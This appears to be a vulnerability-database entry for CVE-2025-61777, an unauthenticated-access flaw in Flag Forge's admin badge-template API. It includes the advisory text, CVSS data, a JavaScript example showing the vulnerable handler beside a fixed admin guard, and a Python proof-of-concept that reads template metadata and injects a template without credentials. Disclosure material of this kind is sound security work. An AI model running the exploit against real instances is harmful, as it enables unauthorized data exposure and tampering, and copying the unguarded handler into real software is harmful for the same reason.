Security Vulnerability Report
CVE-2025-61777 CVSS 9.4 CRITICAL

CVE-2025-61777

Published: 2025-10-06 17:16:08
Last Modified: 2025-10-30 13:53:37

Description

Flag Forge is a Capture The Flag (CTF) platform. Starting in version 2.0.0 and prior to version 2.3.2, the `/api/admin/badge-templates` (GET) and `/api/admin/badge-templates/create` (POST) endpoints previously allowed access without authentication or authorization. This could have enabled unauthorized users to retrieve all badge templates and sensitive metadata (createdBy, createdAt, updatedAt) and/or create arbitrary badge templates in the database. This could lead to data exposure, database pollution, or abuse of the badge system. The issue has been fixed in FlagForge v2.3.2. GET, POST, UPDATE, and DELETE endpoints now require authentication. Authorization checks ensure only admins can access and modify badge templates. No reliable workarounds are available.
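The fix the advisory describes is an authentication check followed by an admin-only authorization check on every badge-template route. The following is an added example, not FlagForge's own code: it shows the vulnerable pattern (a handler that never inspects the caller) next to a guarded version that returns 401 for anonymous callers and 403 for authenticated non-admins. The bearer-token session store, the `role` field, the request/response shapes and the sample template data are all constructed for this example; the real project's auth layer and handlers will differ.

```javascript
// Added example (not FlagForge's code): authn + admin authz guard for the
// /api/admin/badge-templates endpoints named in CVE-2025-61777.
// Session store, user roles, request shapes and template data are constructed.

// Constructed session store: token -> user. A real app would look this up in
// its session backend or verify a signed token.
const SESSIONS = new Map([
  ["tok-admin", { id: "u1", name: "alice", role: "admin" }],
  ["tok-player", { id: "u2", name: "bob", role: "user" }],
]);

// Constructed badge templates, including the metadata the advisory calls sensitive.
const BADGE_TEMPLATES = [
  { id: 1, name: "First Blood", createdBy: "u1",
    createdAt: "2025-09-01T10:00:00Z", updatedAt: "2025-09-02T12:00:00Z" },
];

// Authentication: resolve "Authorization: Bearer <token>" to a user, or null.
function authenticate(req) {
  const header = (req.headers && req.headers["authorization"]) || "";
  const [scheme, token] = header.split(" ");
  if (scheme !== "Bearer" || !token) return null;
  return SESSIONS.get(token) || null;
}

// Authorization guard: 401 when unauthenticated, 403 when not an admin, null when allowed.
function requireAdmin(req) {
  const user = authenticate(req);
  if (!user) return { status: 401, body: { error: "authentication required" } };
  if (user.role !== "admin") return { status: 403, body: { error: "admin role required" } };
  return null;
}

// BEFORE (the vulnerable pattern): the handler never looks at who is calling,
// so anyone can read createdBy/createdAt/updatedAt for every template.
function listBadgeTemplatesVulnerable(req) {
  return { status: 200, body: BADGE_TEMPLATES };
}

// AFTER: every admin handler runs the guard first and returns its rejection unchanged.
function listBadgeTemplates(req) {
  const denied = requireAdmin(req);
  if (denied) return denied;
  return { status: 200, body: BADGE_TEMPLATES };
}

function createBadgeTemplate(req) {
  const denied = requireAdmin(req);
  if (denied) return denied;
  const { name, description, imageUrl, criteria } = req.body || {};
  if (typeof name !== "string" || name.length === 0) {
    return { status: 400, body: { error: "name is required" } };
  }
  const user = authenticate(req); // guard passed, so this is the admin user
  const now = new Date().toISOString();
  const template = { id: BADGE_TEMPLATES.length + 1, name, description, imageUrl,
                     criteria, createdBy: user.id, createdAt: now, updatedAt: now };
  BADGE_TEMPLATES.push(template);
  return { status: 201, body: template };
}

// Tiny router so the handlers can be exercised without a web framework.
function handle(req) {
  switch (`${req.method} ${req.path}`) {
    case "GET /api/admin/badge-templates": return listBadgeTemplates(req);
    case "POST /api/admin/badge-templates/create": return createBadgeTemplate(req);
    default: return { status: 404, body: { error: "not found" } };
  }
}

// Demo: the same anonymous request against the vulnerable and the guarded handler.
const anonymousGet = { method: "GET", path: "/api/admin/badge-templates", headers: {} };
console.log("vulnerable handler, anonymous GET ->", listBadgeTemplatesVulnerable(anonymousGet).status); // 200
console.log("guarded handler,    anonymous GET ->", handle(anonymousGet).status);                      // 401
```

The guard runs before any data access, so a missing route-level check cannot silently fall through to the database; the same `requireAdmin` call belongs in front of the UPDATE and DELETE handlers the advisory also mentions.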

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:flagforge:flagforge:*:*:*:*:*:*:*:* - VULNERABLE
Flag Forge >= 2.0.0
Flag Forge < 2.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61777 - Flag Forge Unauthenticated Badge Template Access PoC
# Affected versions: Flag Forge 2.0.0 - 2.3.1
# Fixed in: Flag Forge 2.3.2

import requests

TARGET_URL = "https://target-flagforge-instance.com"


# Step 1: Exploit GET endpoint to retrieve all badge templates (no auth required)
def exploit_get_badge_templates():
    """
    Exploits the missing authentication on GET /api/admin/badge-templates
    to retrieve all badge templates and sensitive metadata.
    """
    endpoint = f"{TARGET_URL}/api/admin/badge-templates"
    print(f"[*] Sending unauthenticated GET request to {endpoint}")
    response = requests.get(endpoint)

    if response.status_code == 200:
        print(f"[+] Success! Retrieved badge templates (Status: {response.status_code})")
        templates = response.json()
        print(f"[+] Found {len(templates)} badge templates")

        # Extract and display sensitive metadata
        for template in templates:
            print("\n--- Badge Template ---")
            print(f"  Name: {template.get('name', 'N/A')}")
            print(f"  Created By: {template.get('createdBy', 'N/A')}")  # Sensitive
            print(f"  Created At: {template.get('createdAt', 'N/A')}")  # Sensitive
            print(f"  Updated At: {template.get('updatedAt', 'N/A')}")  # Sensitive
        return templates
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        return None


# Step 2: Exploit POST endpoint to create arbitrary badge templates
def exploit_create_badge_template():
    """
    Exploits the missing authentication on POST /api/admin/badge-templates/create
    to inject arbitrary badge templates into the database.
    """
    endpoint = f"{TARGET_URL}/api/admin/badge-templates/create"
    print(f"\n[*] Sending unauthenticated POST request to {endpoint}")

    # Malicious badge template payload
    payload = {
        "name": "Pwned-Template",
        "description": "Injected by CVE-2025-61777 exploit",
        "imageUrl": "https://malicious-site.com/payload.png",
        "criteria": {"type": "manual"},
    }
    headers = {"Content-Type": "application/json"}
    response = requests.post(endpoint, json=payload, headers=headers)

    if response.status_code in [200, 201]:
        print(f"[+] Success! Badge template created (Status: {response.status_code})")
        print(f"[+] Response: {response.text}")
        return True
    else:
        print(f"[-] Failed. Status code: {response.status_code}")
        return False


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-61777 - Flag Forge Unauth Badge Template Access")
    print("=" * 60)

    # Execute exploit chain
    templates = exploit_get_badge_templates()
    exploit_create_badge_template()
    print("\n[*] Exploit complete.")

References

https://github.com/FlagForgeCTF/flagForge/commit/e2121c5fb7a512a49dcd875812c944265fb1a846 (Patch)
https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-26rx-c53q-rjf9 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61777", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:08.127", "lastModified": "2025-10-30T13:53:37.307", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flag Forge is a Capture The Flag (CTF) platform. Starting in version 2.0.0 and prior to version 2.3.2, the `/api/admin/badge-templates` (GET) and `/api/admin/badge-templates/create` (POST) endpoints previously allowed access without authentication or authorization. This could have enabled unauthorized users to retrieve all badge templates and sensitive metadata (createdBy, createdAt, updatedAt) and/or create arbitrary badge templates in the database. This could lead to data exposure, database pollution, or abuse of the badge system. The issue has been fixed in FlagForge v2.3.2. GET, POST, UPDATE, and DELETE endpoints now require authentication. Authorization checks ensure only admins can access and modify badge templates. No reliable workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": 
[{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-306"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flagforge:flagforge:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndExcluding": "2.3.2", "matchCriteriaId": "E0175E93-CF73-4186-AAC1-5BB11D48F70F"}]}]}], "references": [{"url": "https://github.com/FlagForgeCTF/flagForge/commit/e2121c5fb7a512a49dcd875812c944265fb1a846", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/FlagForgeCTF/flagForge/security/advisories/GHSA-26rx-c53q-rjf9", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}